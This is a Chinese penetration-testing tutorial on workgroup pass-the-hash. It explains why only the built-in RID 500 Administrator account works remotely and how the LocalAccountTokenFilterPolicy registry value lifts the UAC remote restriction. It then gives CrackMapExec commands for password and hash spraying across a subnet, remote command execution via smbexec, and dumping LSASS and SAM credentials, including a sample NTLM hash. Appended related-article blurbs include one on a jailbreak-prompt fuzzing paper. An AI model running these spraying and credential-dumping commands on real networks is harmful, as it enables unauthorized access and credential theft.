工作组PTH

文章目录

          • 简述
          • RID 500本地管理员密码喷洒
            • 何为RIP 500 安全标识符
            • SID与RID
            • PTH为何必须是RID 500
            • CrackMapExec进行密码喷洒

简述
在工作组PTH中为什么只有administrator账号可以,下面进行讲解与利用。
RID 500本地管理员密码喷洒
何为RIP 500 安全标识符

安全标识符

安全标识符:安全标识符用于唯一标识安全主体或安全组。 安全主体可以表示可由操作系统进行身份验证的任何实体,例如用户帐户、
计算机帐户或在用户或计算机帐户的安全上下文中运行的线程或进程。每个帐户或组,或在帐户的安全上下文中运行的每个进程都具有由颁发机构(如 Windows 域控制器)颁发的唯一 SID。 
SID 存储在安全数据库中。 在创建帐户或组时,系统将生成用于标识特定帐户或组的 SID。 如果已将某个 SID 用作用户
或组的唯一标识符,则该 SID 绝不能再次用于标识其他用户或组。每次用户登录时,系统都会为该用户创建访问令牌。 访问令牌包含用户的 SID、用户权限以及用户所属的任何组的 SID。 
此令牌为用户在该计算机上执行的任何操作提供安全上下文。除了分配给特定用户和组的唯一创建的域专用 SID 外,还有用来标识通用群体和通用用户的公认 SID。 例如,“Everyone and 
World”SID 标识包含所有用户的组。 公认 SID 的值在所有操作系统中保持不变。从上面的微软描述中可以认识到安全标识符的作用是用于标识安全主体或者安全组,安全主体比如用户账号例子:常见公认SID举例:
KRBTGT(S-1-5-域-502):密钥分发中心 (KDC) 服务使用的用户帐户。 该帐户仅存在于域控制器上域管理员:(S-1-5-域-512)包含有权管理域的成员的全局组。 默认情况下,“Domain Admins”组是已加入域的所有计算机
(包括域控制器)上的“Administrators”组的成员。“Domain Admins”是组的任何成员在域的 Active Directory 中创建的
任何对象的默认所有者。 如果组的成员创建其他对象(如文件),则默认所有者是“Administrators”组。管理员(S-1-5-域-500):系统管理员的用户帐户。 每台计算机都有一个本地“Administrator”帐户,每个域都有一个域“Administrator”
帐户。“Administrator”帐户是在操作系统安装过程中创建的第一个帐户。 无法删除、禁用或锁定此帐户,但可以重命名此帐户。
默认情况下,管理员帐户是“Administrator”组的成员,无法从该组中删除。从微软的说明中可以看到Administrator的安全标识符是S-1-5-域-500可是为什么又叫RID 500下面开始讲解。
SID与RID
SID(安全标识符) Active Directory 域控制器副本分配SID
RID(相对标识符分配) 本地安全帐户管理器 (SAM)分配RID

在这里插入图片描述

从上述微软说明中可以看到SID的分配涉及到了域相关的部分,创建一个SID由Active Directory 域控制器进行分配
并且将副本广播到其他域控,RID的分配简单很多是一个单主机操作并分配与存储的地方是本机SAM管理的帐户数据库中
,这就是SID与RID管理简单的理解还有许多没讲的比如RIP可以看成是SID的一部分因为RID的颁发机构是SID,详细可以
具体查看微软文档不在过多赘述。
PTH为何必须是RID 500
从上述内容中可以看到除了500之外还有其他安全主体相信大家在PTH的时候到非域环境的时候必须administrator账号
才能成功为什么其他账号就不行呢,比如位于管理员组的其他账号为什么不行,administrator的RID就是500也就是说为何
非RID 500的账号工作组环境中无法PTH,我建议大家看下微软的资料。

在服务器管理器中配置远程管理

重点阅读:启用或禁用远程管理

在这里插入图片描述

用户帐户控制和远程限制说明

重点阅读:UAC 远程限制如何工作本地用户帐户(安全帐户管理器用户帐户)

在这里插入图片描述

	如何禁用UAC远程限制

在这里插入图片描述

用户帐户控制和 WMI

重点阅读:在 UAC 下处理远程连接

在这里插入图片描述

从重点阅读的内容多次出现的UAC就能猜到这跟UAC有关那么我将为大家进行简单的梳理。
启用或禁用远程管理:在远程管理管理的时候内置管理员帐户之外的本地管理员帐户也可能不具有远程管理服务器的权限也就是说,administrator是内置管理员账号除了它之外的加入到本机管理员组的比如admin账号是无法进行远程管理的,WinRM也同样受此影响。UAC远程限制如何工作:UAC在远程登录的时候比如PTH/WinRM是受到限制的,限制的原因是为了助于防止环回攻击的恶意软件。本地用户帐户(安全帐户管理器用户帐户):这种UAC限制是通过除内置管理员账号之外的本机管理员账号连接都是被降权过的,它们无法进行权限提升,是不完全管理员身份进行连接的,换句话说是已标准用户身份运行而非管理员身份运行,只有在程协助或远程桌面管理RDP下才已完全管理员身份进行连接。如何禁用UAC远程限制:regedit打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System找到LocalAccountTokenFilterPolicy项如果不存在则新建创建DWORD的LocalAccountTokenFilterPolicy值的数值为1则禁用UAC远程限制,本地管理员组账号如admin在其中则可以正常使用PTH/WinRM等进行登录。在UAC下处理远程连接:UAC限制跟是否处于工作组或域中有关,这也就解释了为什么域管可以正常登录而不受UAC限制的影响,域账号的UAC访问令牌过滤不会被影响。
CrackMapExec进行密码喷洒
在工作组下为什么只有RID 500才能进行远程登录已经讲过了下面将进行密码复用,在工作组中运维或者负责人在安装
系统的时候为了方便将内置管理员账号使用同一个密码可能在多台机器上同时使用这个时候就可以进行密码喷洒进行
横向移动,下面将先进行CrackMapExec工具的使用。
CrackMapExec密码喷洒:下载地址:https://github.com/byt3bl33d3r/CrackMapExec介绍:进行密码喷洒命令格式:./cme smb 192.168.80.1/24 -u 'Administrator' -p 'WindowsServer2016' 显示Pwn3d!说明密码正确

在这里插入图片描述

CrackMapExec喷洒并执行命令:
./cme smb 192.168.80.1/24 -u 'Administrator' -p 'WindowsServer2016' --local-auth -x whoami --exec-method smbexec

在这里插入图片描述

实战中抓取密码hash形式而不是明文形式下面使用mimikatz抓取hash然后尝试hash密码喷洒	
PTH密码喷洒:
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a'

在这里插入图片描述

PTH密码喷洒执行命令
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' --local-auth -x whoami --exec-method smbexec

在这里插入图片描述

利用CrackMapExec模块
CrackMapExec 协议 -L 查看支持哪些模块

在这里插入图片描述

利用lsassy模块对lsass进行远程转储并查看账号与密码hash
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' -M lsassy

在这里插入图片描述

可以看到lsassy模块成功抓取到了WIN-1IH6AQ46IHM\admin ebb81dddafd1c0222fd2022c2da26853
admin的Hash,当然也可以使用其他协议的模块,需要注意的是不同的协议可用的模块也不一样下面查看
下mssql的模块。

在这里插入图片描述

当然除了lsass远程转储也可以获取sam的内容
./cme smb 192.168.80.1/24 -u 'Administrator' -H 'f56493db963060257da87735557c6d5a' --local-auth --sam

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/11431.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

触摸OpenNJet,云原生世界触手可及

🌈个人主页: Aileen_0v0 🔥热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法 ​💫个人格言:“没有罗马,那就自己创造罗马~” 文章目录 导言OpenNJet云原生引擎介绍云原生平台的介绍优化与创新 为什么选择OpenNJet云原生引擎如何在windo…

Pytorch基础:torch.cuda.set_device函数

相关阅读 Pytorch基础https://blog.csdn.net/weixin_45791458/category_12457644.html?spm1001.2014.3001.5482 torch.cuda.set_device函数用于设置当前使用的cuda设备,在当拥有多个可用的GPU且能被pytorch识别的cuda设备情况下(环境变量CUDA_VISIBLE_…

【AI大模型】自动生成红队攻击提示--GPTFUZZER

本篇参考论文为: Yu J, Lin X, Xing X. Gptfuzzer: Red teaming large language models with auto-generated jailbreak prompts[J]. arXiv preprint arXiv:2309.10253, 2023. https://arxiv.org/pdf/2309.10253 一 背景 虽然LLM在今天的各个领域得到了广泛的运用…

MacOS java多版本安装与管理

Home - SDKMAN! the Software Development Kit Manager # 安装sdkman curl -s "https://get.sdkman.io" | bashsource "$HOME/.sdkman/bin/sdkman-init.sh"sdk version正常出现sdkman版本号就安装成功了 # 安装java # 安装java8 sdk install java 8.0…

论文笔记:仅一个进程故障就无法达成共识

仅一个进程故障就无法达成共识 仅一个进程故障指的是在异步的分布式系统中 摘要 异步系统的共识问题(consensus)涉及一组进程,其中有的进程可能不可靠(unreliable)。共识问题要求可靠的进程一致地从两个侯选中决定&…

【MATLAB源码-第207期】基于matlab的单相光伏并网系统仿真,并网策略采用基于扰动观测法的MPPT模型和使用电压电流双闭环SPWM控制。

操作环境: MATLAB 2022a 1、算法描述 本文将重点分析光伏发电最大功率点跟踪(MPPT)技术和逆变器的并网控制技术,并在Simulink环境下建立模拟系统,以体现这些技术的应用与效果。文章结构如下:首先简介光伏…

OpenAI下周发布更新;TikTok将自动标记AIGC;智谱AI亮相2024 ICLR

OpenAI 官宣下周举办直播发布更新 OpenAI 今日凌晨官宣,将在当地时间 5 月 13 日上午十点(北京时间 5 月 14 日凌晨两点)在官网进行直播,届时将演示一些 ChatGPT 和 GPT-4 的更新。 OpenAI CEO Sam Altman 补充表示,届…

2024软件测试面试必备面试题大全

1. 请自我介绍一下(需简单清楚的表述自已的基本情况,在这过程中要展现出自信,对工作有激情,上进,好学) 面试官您好,我叫###,今年26岁,来自江西九江,就读专业是电子商务,…

PCIE协议-2-事务层规范-MEM/IO/CFG request rules

2.2.7 内存、I/O和配置请求规则 以下规则适用于所有内存、I/O和配置请求。每种类型的请求还有特定的额外规则。 所有内存、I/O和配置请求除了常见的头标字段外,还包括以下字段:requester ID[15:0]和Tag[9:0],形成事务ID。Last DW BE[3:0] a…

ICode国际青少年编程竞赛- Python-2级训练场-列表遍历

ICode国际青少年编程竞赛- Python-2级训练场-列表遍历 1、 for i in range(3):Flyer[i].step(2) Dev.step(6)2、 for i in range(7):Flyer[i].step() Dev.step(Item.x - Dev.x)3、 for i in range(3):Flyer[i].step(1) Dev.step(4) Dev.turnLeft() Dev.step(2) Dev.turnL…

【APM】在Kubernetes中搭建OpenTelemetry+Loki+Tempo+Grafana链路追踪(一)

文章目录 1、最终效果2、前提准备2、环境信息3、服务集成(Opentelemetry ->Tempo)3.1 上报链路数据3.1.1 下载opentelemetry-agent3.1.2 启动配置业务app3.1.3 配置opentelemetry输入输出3.1.4 配置grafana datasource3.1.4.1 配置tempo3.1.4.2 配置l…

快速判断出485从站设备是否支持MODBUS RTU无线通讯

对于变频器和仪表设备,都支持485串口通讯,那么怎么判断从站设备支持那种协议呢?通常分为两种方式去判断:1.从设备参数参看2.从设备通讯报文查看。本次文章以以台达MH300系列变频器为例。 1.从设备通讯参数查看 使用设备之前一定…

资料如何打印更省钱

在日常工作和学习中,我们经常需要打印各种资料。然而,随着打印成本的不断提高,如何更省钱地打印资料成为了大家关注的焦点。今天,就为大家分享一些资料打印的省钱技巧,并推荐一个省钱又省心的打印平台。 首先&#xff…

【话题】软件开发的航海图:程序员的实用神器探秘

大家好,我是全栈小5,欢迎阅读小5的系列文章,这是《话题》系列文章 目录 背景一、代码编写二、版本控制三、测试与调试四、部署与运维五、总结文章推荐 背景 在软件开发的广阔海洋中,每一位程序员都是一位勇敢的航海家&#xff0c…

数据结构-栈的讲解

栈的概念及结构 栈:一种特殊的线性表,其只允许在固定的一端进行插入和删除元素操作。 进行数据插入和删除操作的一端称为栈顶,另一端称为栈底(因为先进后出)。栈中的数据元素遵守后进先出LIFO(Last In Firs…

学习注意力机制并将其应用到网络中

什么是注意力机制 注意力机制的核心重点就是让网络关注到它更需要关注的地方。 当我们使用卷积神经网络去处理图片的时候,我们会更希望卷积神经网络去注意应该注意的地方,而不是什么都关注,我们不可能手动去调节需要注意的地方,…

证明力引导算法forceatlas2为什么不是启发式算法

一、基本概念 吸引力 F a ( n i ) ∑ n j ∈ N c t d ( n i ) ω i , j d E ( n i , n j ) V i , j \displaystyle \bm{F}_a(n_i) \sum_{n_j \in \mathcal{N}_{ctd}(n_i)} \omega_{i,j} \; d_E(n_i,n_j) \bm{V}_{i,j} Fa​(ni​)nj​∈Nctd​(ni​)∑​ωi,j​dE​(ni​,nj​…

class常量池、运行时常量池和字符串常量池的关系

类常量池、运行时常量池和字符串常量池这三种常量池,在Java中扮演着不同但又相互关联的角色。理解它们之间的关系,有助于深入理解Java虚拟机(JVM)的内部工作机制,尤其是在类加载、内存分配和字符串处理方面。 类常量池…

NeurIPS‘24 截稿日期逼近 加拿大温哥华邀你共赴盛会

会议之眼 快讯 第38届NeurIPS24(Conference and Workshop on Neural Information Processing Systems)即神经信息处理系统研讨会将于 2024 年 12月9日-15日在加拿大温哥华会议中心举行! NeurIPS 每一年都是全球AI领域的一场盛宴,吸引着来自世界各地的顶…

5.10.8 Transformer in Transformer

Transformer iN Transformer (TNT)。具体来说,我们将局部补丁(例如,1616)视为“视觉句子”,并将它们进一步划分为更小的补丁(例如,44)作为“视觉单词”。每个单词的注意力将与给定视…